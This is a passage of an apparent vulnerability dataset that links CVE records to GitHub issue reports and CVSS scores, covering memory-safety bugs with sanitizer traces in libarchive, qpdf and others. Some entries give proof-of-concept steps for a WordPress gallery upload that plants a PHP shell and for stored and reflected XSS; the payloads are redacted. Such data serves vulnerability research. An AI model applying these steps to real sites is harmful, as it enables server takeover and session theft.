        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8871",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/563",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/563",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2015-08-14T16:58:01Z",
        "description": "Use after free in opj_j2k_write_mco. Hi, I have found a potential use after free in opj_j2k_write_mco function, of the FILETAG file. At line NUMBERTAG URLTAG , l_current_data is set to p_j2k APITAG But at line NUMBERTAG URLTAG , p_j2k APITAG is used as arg of realloc, and so can be freed. But l_current_data is used later (line NUMBERTAG URLTAG NUMBERTAG URLTAG ...), and so can point to a freed memory zone A simple fixed, should be to affect l_current_data to p_j2k APITAG after the line NUMBERTAG URLTAG The vulnerability was found by my static binary analyzer gueb (that will become open source soon) Regards, Feist Josselin",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8872",
        "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/12",
        "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/12",
        "Repo_new": "dosfstools/dosfstools",
        "Issue_Created_At": "2015-09-08T08:18:17Z",
        "description": "APITAG invalid memory access in get_fat. This file will generate some invalid memory read in APITAG URLTAG Judging from the output of address sanitizer and valgrind it is a bit unusual, it seems to be neither memory on the stack or heap, but it also doesn't crash the app if run without asan or valgrind. Happens both with the latest release and latest git code. Found with american fuzzy lop. This is the address sanitizer stack trace NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d8 (pc NUMBERTAG f1ace bp NUMBERTAG ffcae3ad NUMBERTAG sp NUMBERTAG ffcae3ad NUMBERTAG T NUMBERTAG f1acd in get_fat PATHTAG NUMBERTAG ea4e6 in check_file PATHTAG NUMBERTAG ea4e6 in check_files PATHTAG NUMBERTAG ede NUMBERTAG in scan_dir PATHTAG NUMBERTAG ede NUMBERTAG in subdirs PATHTAG NUMBERTAG e4f NUMBERTAG in scan_root PATHTAG NUMBERTAG ddaf4 in main PATHTAG NUMBERTAG efe5b4eef9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG get_fat",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.2,
        "impactScore": 3.6,
        "exploitabilityScore": 2.5
    },
    {
        "CVE_ID": "CVE-2015-8877",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/173",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/173",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2015-07-13T16:02:50Z",
        "description": "APITAG can leak memory. In APITAG a tmp_im is created with APITAG URLTAG , but later freed with APITAG URLTAG instead of APITAG This is likely to cause a memory leak. See also the related downstream bug report CVETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-8928",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/550",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/550",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-05-21T19:37:41Z",
        "description": "Out of bounds read in function APITAG on malformed mtree file. This sample file will generate an out of bounds read access: URLTAG File content NUMBERTAG link NUMBERTAG Address Sanitizer output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef4f at pc NUMBERTAG b NUMBERTAG cc bp NUMBERTAG fff5ddb NUMBERTAG d0 sp NUMBERTAG fff5ddaf NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef4f thread T NUMBERTAG b NUMBERTAG cb in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG ac in process_add_entry PATHTAG NUMBERTAG b4fc1 in read_mtree PATHTAG NUMBERTAG ad NUMBERTAG in read_header PATHTAG NUMBERTAG d in _archive_read_next_header2 PATHTAG NUMBERTAG de2 in _archive_read_next_header PATHTAG NUMBERTAG b0c7de in archive_read_next_header PATHTAG NUMBERTAG e1f in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f4e NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ef4f is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in realloc ( PATHTAG NUMBERTAG a NUMBERTAG in archive_string_ensure PATHTAG NUMBERTAG ce NUMBERTAG in readline PATHTAG NUMBERTAG b NUMBERTAG d7 in read_mtree PATHTAG NUMBERTAG ad NUMBERTAG in read_header PATHTAG NUMBERTAG d in _archive_read_next_header2 PATHTAG NUMBERTAG de2 in _archive_read_next_header PATHTAG NUMBERTAG b0c7de in archive_read_next_header PATHTAG NUMBERTAG e1f in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f4e NUMBERTAG f9f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa NUMBERTAG fa[fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9df NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8931",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/539",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/539",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-05-12T16:22:51Z",
        "description": "undefined behaviour in APITAG When compiling libarchive with the compile flag fsanitize=undefined (enabling undefined behaviour sanitizer) it'll throw a warning when trying to open any mtree file: APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long int' APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long int' This is the code that's causing this: static int NUMBERTAG t get_time_t_max(void) { if defined(TIME_T_MAX) return TIME_T_MAX; else static time_t t; time_t a; if (t NUMBERTAG a NUMBERTAG while (a > t) { t = a; a = a NUMBERTAG return t; endif } static int NUMBERTAG t get_time_t_min(void) { if defined(TIME_T_MIN) return TIME_T_MIN; else / 't' will hold the minimum value, which will be zero (if time_t is unsigned) or NUMBERTAG n (if time_t is signed). / static int computed; static time_t t; time_t a; if (computed NUMBERTAG a = (time_t NUMBERTAG while (a < t) { t = a; a = a NUMBERTAG computed NUMBERTAG return t; endif } What libarchive is trying to do here is calculating the value of TIME_T_MIN/MAX by triggering an overflow. However overflows in signed values are undefined in C. This code is therefore strictly speaking invalid, the compiler may do whatever it likes in such situations, without any defined outcome. I haven't come up with an elegant other way to do this yet. Probably the best would be to convince the glibc devs to define TIME_T_MIN/MAX in their headers.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8932",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/547",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/547",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-05-20T00:04:53Z",
        "description": "undefined behaviour / invalid shiftleft in compress_bidder_init. This file will trigger a shiftleft of NUMBERTAG bytes of a signed NUMBERTAG bit integer: URLTAG (just two bytes NUMBERTAG f NUMBERTAG d) A shiftleft of the full size of a variable type is undefined in c. This can be seen by compiling libarchive with fsanitize=undefined and trying to unpack the file (bsdtar xf). Here's the error message / crash dump: APITAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int NUMBERTAG a NUMBERTAG b6 in compress_bidder_init PATHTAG NUMBERTAG fe NUMBERTAG a in choose_filters PATHTAG NUMBERTAG ec8c2 in archive_read_open1 PATHTAG NUMBERTAG b9c in archive_read_open_filenames PATHTAG NUMBERTAG in archive_read_open_filename PATHTAG NUMBERTAG in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f1be NUMBERTAG a4f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG undefined behavior APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8933",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/548",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/548",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2015-05-20T00:15:08Z",
        "description": "undefined behaviour / signed integer overflow in APITAG Using this malformed tar file with \"bsdtar tf [input]\" will cause a signed integer overflow: FILETAG Signed integer overflows are undefined in C. This can be seen by compiling libarchive with fsanitize=undefined. Here's the crash dump: PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long NUMBERTAG c NUMBERTAG in archive_read_format_tar_skip PATHTAG NUMBERTAG in archive_read_data_skip PATHTAG NUMBERTAG a NUMBERTAG in read_archive PATHTAG NUMBERTAG dbb in tar_mode_t PATHTAG NUMBERTAG feddc in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG undefined behavior APITAG bsdtar: (null) bsdtar: Error exit delayed from previous errors.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-8945",
        "Issue_Url_old": "https://github.com/openshift/origin/issues/3951",
        "Issue_Url_new": "https://github.com/openshift/origin/issues/3951",
        "Repo_new": "openshift/origin",
        "Issue_Created_At": "2015-07-29T20:28:23Z",
        "description": "openshift node is logging private RSA keys to the systemd journal. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.1,
        "impactScore": 3.6,
        "exploitabilityScore": 1.4
    },
    {
        "CVE_ID": "CVE-2015-8947",
        "Issue_Url_old": "https://github.com/behdad/harfbuzz/issues/139",
        "Issue_Url_new": "https://github.com/harfbuzz/harfbuzz/issues/139",
        "Repo_new": "harfbuzz/harfbuzz",
        "Issue_Created_At": "2015-10-09T20:45:00Z",
        "description": "fuzzing harfbuzz. This in an umbrella issue for setting up regular fuzzing for harfbuzz and fixing the bugs that we find with fuzzing. The starting point is the target function below used with FILETAG . CODETAG Eventually we'll need to submit this function to harfbuzz repo and extend it to cover more code. Currently, this is my workflow to build the fuzzer NUMBERTAG Get fresh FILETAG and build FILETAG NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 7.6,
        "impactScore": 4.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9096",
        "Issue_Url_old": "https://github.com/rubysec/ruby-advisory-db/issues/215",
        "Issue_Url_new": "https://github.com/rubysec/ruby-advisory-db/issues/215",
        "Repo_new": "rubysec/ruby-advisory-db",
        "Issue_Created_At": "2015-12-11T05:59:01Z",
        "description": "Add advisory for SMTP injection vulnerability in mail NUMBERTAG Need an advisory for the mail vulnerability discussed in FILETAG Affects NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9228",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/6",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/6",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-09-14T11:33:13Z",
        "description": "Malicious File Upload in APITAG Gallery by Photocrati Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name Malicious File upload Software: APITAG Gallery Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: Malicious File upload vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed in the following URL URLTAG which is vulnerable to file upload in file and name variable from which name variable extension is modified from JPG to PHP and file variable containing image content/information is semi modified with PHP shell to be executed in the server which can be accessed with the help of publicly available URL. here, it is URLTAG APITAG NUMBERTAG APITAG The Post Request file and name variable in the URL URLTAG is vulnerable to file upload. In which name variable extension is modified from JPG to PHP and file variable is added with PHP shell to be executed in the server which can be accessed with the help of publicly available URL URLTAG FILETAG APITAG NUMBERTAG APITAG Normal request to the server FILETAG APITAG NUMBERTAG APITAG File variable modified from JPG to PHP FILETAG APITAG NUMBERTAG APITAG Mixing the content of the uploading file with shell content to get executed FILETAG APITAG NUMBERTAG APITAG Showing that file has been uploaded as image into the server FILETAG APITAG NUMBERTAG APITAG Originally, file have been stored in PHP format which can be executed from outside login FILETAG APITAG NUMBERTAG APITAG Shell Executed giving system information of the hosted server. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Move on to Next Gen Gallery plugin file upload option available on products NUMBERTAG Upload JPG file to the server through file upload option NUMBERTAG Modify the file variable contains JPG extension to PHP. Also, edit and add shell content to the name variable body containing JPG information/content. APITAG APITAG NUMBERTAG Discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor responded in the same NUMBERTAG Fixed in APITAG Gallery NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-9229",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/5",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/5",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-09-14T11:10:04Z",
        "description": "XSS in APITAG Gallery by Photocrati Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: APITAG Gallery Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG images FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to images FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable images NUMBERTAG alttext] in APITAG Gallery Photocrati Version NUMBERTAG recently updated version) in the URL URLTAG NUMBERTAG Fill all the variables with APITAG payload and save it to view further NUMBERTAG Now, the added XSS payload will be executed whenever the user reviews it. APITAG APITAG NUMBERTAG Discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor responded saying, APITAG you, we'll inform NGG about this NUMBERTAG Same vulnerability again discovered in APITAG Gallery NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG Same vulnerability found & still exist in APITAG Gallery NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2015-9230",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/3",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/3",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-09-14T10:25:09Z",
        "description": "XSS Vulnerability in APITAG Security Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: APITAG Security Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin APITAG Security Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. FILETAG and modify the value of APITAG variable with \"> APITAG APITAG APITAG payload and send the request to the server. Now, the added XSS payload will be echoed back from the server without validating the input. It also affects FILETAG file, $table_prefix and corrupts the database connectivity. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The Post Request APITAG variable in the URL FILETAG is vulnerable to Cross Site Scripting (XSS) APITAG NUMBERTAG APITAG Invalid HTTP script Request sent to the server through the vulnerable APITAG APITAG variable in the URL FILETAG APITAG NUMBERTAG APITAG Echoed back HTTP Response without validation. APITAG NUMBERTAG APITAG Response Executed in the browser with Cookie value APITAG NUMBERTAG APITAG $table_prefix is also damaged with the given XSS Payload APITAG NUMBERTAG APITAG Error message after the payload gets executed in the browser APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the value of APITAG variable in APITAG Security NUMBERTAG Fill all the variables with APITAG APITAG payload and send the request to the server NUMBERTAG Now, the added XSS payload will be echoed back from the server without validating the input even after FILETAG file has been configured with XSS filter settings NUMBERTAG It also affects FILETAG file $table_prefix and corrupts the database connectivity APITAG APITAG NUMBERTAG Discovered in APITAG Security Plugin NUMBERTAG Fixed in APITAG Security Plugin Version NUMBERTAG APITAG by: APITAG Sathish from Cyber Security Works Pvt Ltd",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2015-9236",
        "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2850",
        "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2850",
        "Repo_new": "hapijs/hapi",
        "Issue_Created_At": "2015-10-16T19:22:15Z",
        "description": "NUMBERTAG Release Notes. Summary hapi NUMBERTAG is primarily a rewrite of the CORS implementation. The previous code was both confusing, an incorrect implementation of the protocol, and allowed for configurations that at best returned inconsistent headers and at worst allowed cross origin activities that were expected to be forbidden. The change removes half the CORS options available and moves the implementation to be truly per route without any connection wide catch all. Upgrade time : low no time to a couple of hours for most users Complexity : low a bit of search and replace and removal of unsupported configs Risk : low low risk of side effects and few changes to keep track of overall Dependencies : medium removed the APITAG method Sponsor APITAG APITAG APITAG The NUMBERTAG major release is sponsored by FILETAG . Breaking Changes Removed the CORS configuration options: methods , APITAG , APITAG , APITAG , and override . Added the APITAG HTTP status code to the default list of cached responses. The qs module no longer parses dot notation names into sub objects by default. Removed APITAG . Removed id from the APITAG event data (was already available as a generic event property). New Features Allow response validation of non object responses (string, number, etc). New option to override empty APITAG HTTP status responses with APITAG . Bug fixes Fixes multiple issues with CORS, including a few security related. Updated dependencies qs from NUMBERTAG to NUMBERTAG Migration Checklist CORS You don't have to change anything if: not setting the cors route option using it with the defaults by setting the value to true not using the cors options: methods , APITAG , APITAG , APITAG , and override The main changes are: CORS preflight headers are no set only on reflight requests and no on resource requests. This means that the methods and APITAG options are no longer needed because the preflight response will return the requested method as specified by the protocol. This will ensure other methods which may not allow cross origin access to be separately configured. The override flag is no longer needed as the only header which you may manually set at the handler level is Access Control Expose Headers which will be appended by default. Setting any other CORS header manually will result in a conflict with the preflight response. The Access Control Allow Origin header is now always set to the incoming Origin header value. If the incoming value does not match the allowed origins, no CORS headers are set. Checklist: Make sure that if you are using the internal CORS feature, you are not setting ANY CORS headers yourself other than Access Control Expose Headers. If you need to set any other header manually, do not use the CORS feature! You will end up with a broken and potentially insecure implementation. Remove the options no longer supported. There is no need to replace them. Misc If you rely on the previous qs query parsing behavior of breaking dot notation into segments, you must set the APITAG option to true . This is available in route config APITAG and connection config APITAG . Replace APITAG with APITAG . If you listen to the request APITAG event, use the APITAG value instead of the removed APITAG value.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-9236",
        "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2840",
        "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2840",
        "Repo_new": "hapijs/hapi",
        "Issue_Created_At": "2015-10-14T08:38:36Z",
        "description": "CORS route specific override can conflict with connection defaults. If the connection has CORS enabled but one route has it off, and the route is not GET, the OPTIONS prefetch request will return the default CORS headers and then the actual request will go through and return no CORS headers. This defeats the purpose of turning CORS on the route.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-9243",
        "Issue_Url_old": "https://github.com/hapijs/hapi/issues/2980",
        "Issue_Url_new": "https://github.com/hapijs/hapi/issues/2980",
        "Repo_new": "hapijs/hapi",
        "Issue_Created_At": "2015-12-17T06:16:58Z",
        "description": "CORS regression in hapi NUMBERTAG It seems that the server option's route defaults are no longer used when route specific config options are present NUMBERTAG worked as expected, and APITAG does not. ERRORTAG ERRORTAG But adding a 'cors' configuration object to the route, causes the 'access control allow credentials' header to be dropped ERRORTAG ERRORTAG Is this intentional? I much prefer being able to have default values in place and explicitly override specific keys, rather than have to respecify all values for a route where only one of them needs customized.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-9252",
        "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/51",
        "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/51",
        "Repo_new": "qpdf/qpdf",
        "Issue_Created_At": "2015-09-02T13:08:54Z",
        "description": "crash / stack overflow with malformed input pdf. Passing this pdf to qpdf will cause a crash: FILETAG Looking at the stack trace this seems to be an endless recursion causing a stack overflow. Here's (part of) the stack trace when compiling qpdf with address sanitizer (latest git code NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffdede NUMBERTAG pc NUMBERTAG f5ddac0dce7 bp NUMBERTAG ffdede NUMBERTAG e NUMBERTAG sp NUMBERTAG ffdede NUMBERTAG T NUMBERTAG f5ddac0dce6 in pcre_compile2 APITAG NUMBERTAG b in PCRE::PCRE(char const , int) PATHTAG NUMBERTAG ece NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG b in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) PATHTAG NUMBERTAG c4c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) PATHTAG NUMBERTAG bcf0c in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF ) PATHTAG NUMBERTAG b4d0 in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG long long, APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, int&, int&) PATHTAG NUMBERTAG da2 in QPDF::resolve(int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG , int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ca in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG NUMBERTAG b NUMBERTAG in APITAG long long, APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, int&, int&) PATHTAG NUMBERTAG da2 in QPDF::resolve(int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG , int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ca in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-9260",
        "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/8",
        "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/8",
        "Repo_new": "cybersecurityworks/disclosed",
        "Issue_Created_At": "2015-10-14T12:17:01Z",
        "description": "Bedita CMS NUMBERTAG Publication Module Bug Report. Details ================ Bedita CMS NUMBERTAG Publication Module Bug Report Bug Name: XSS APITAG Site Scripting) Version NUMBERTAG Last Updated: PATHTAG Homepage: FILETAG Severity High Description: XSS vulnerability in Bedita CMS NUMBERTAG Publication module Proof of concept: (POC) ================== Issue: POST request URL URLTAG of Bedita CMS NUMBERTAG is vulnerable to Cross Site Scripting (XSS) FILETAG Figure NUMBERTAG SS Payload injected in the given URL URLTAG is reflected back in the response FILETAG Figure NUMBERTAG SS Payload gets executed in the browser APITAG by: APITAG Arjun Basnet from APITAG Cyber Security Works Pvt Ltd APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2015-9260",
        "Issue_Url_old": "https://github.com/bedita/bedita/issues/755",
        "Issue_Url_new": "https://github.com/bedita/bedita/issues/755",
        "Repo_new": "bedita/bedita",
        "Issue_Created_At": "2015-10-14T12:19:59Z",
        "description": "Bedita CMS NUMBERTAG Publication Module Bug Report. Hi Team: please find the detail report link below URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
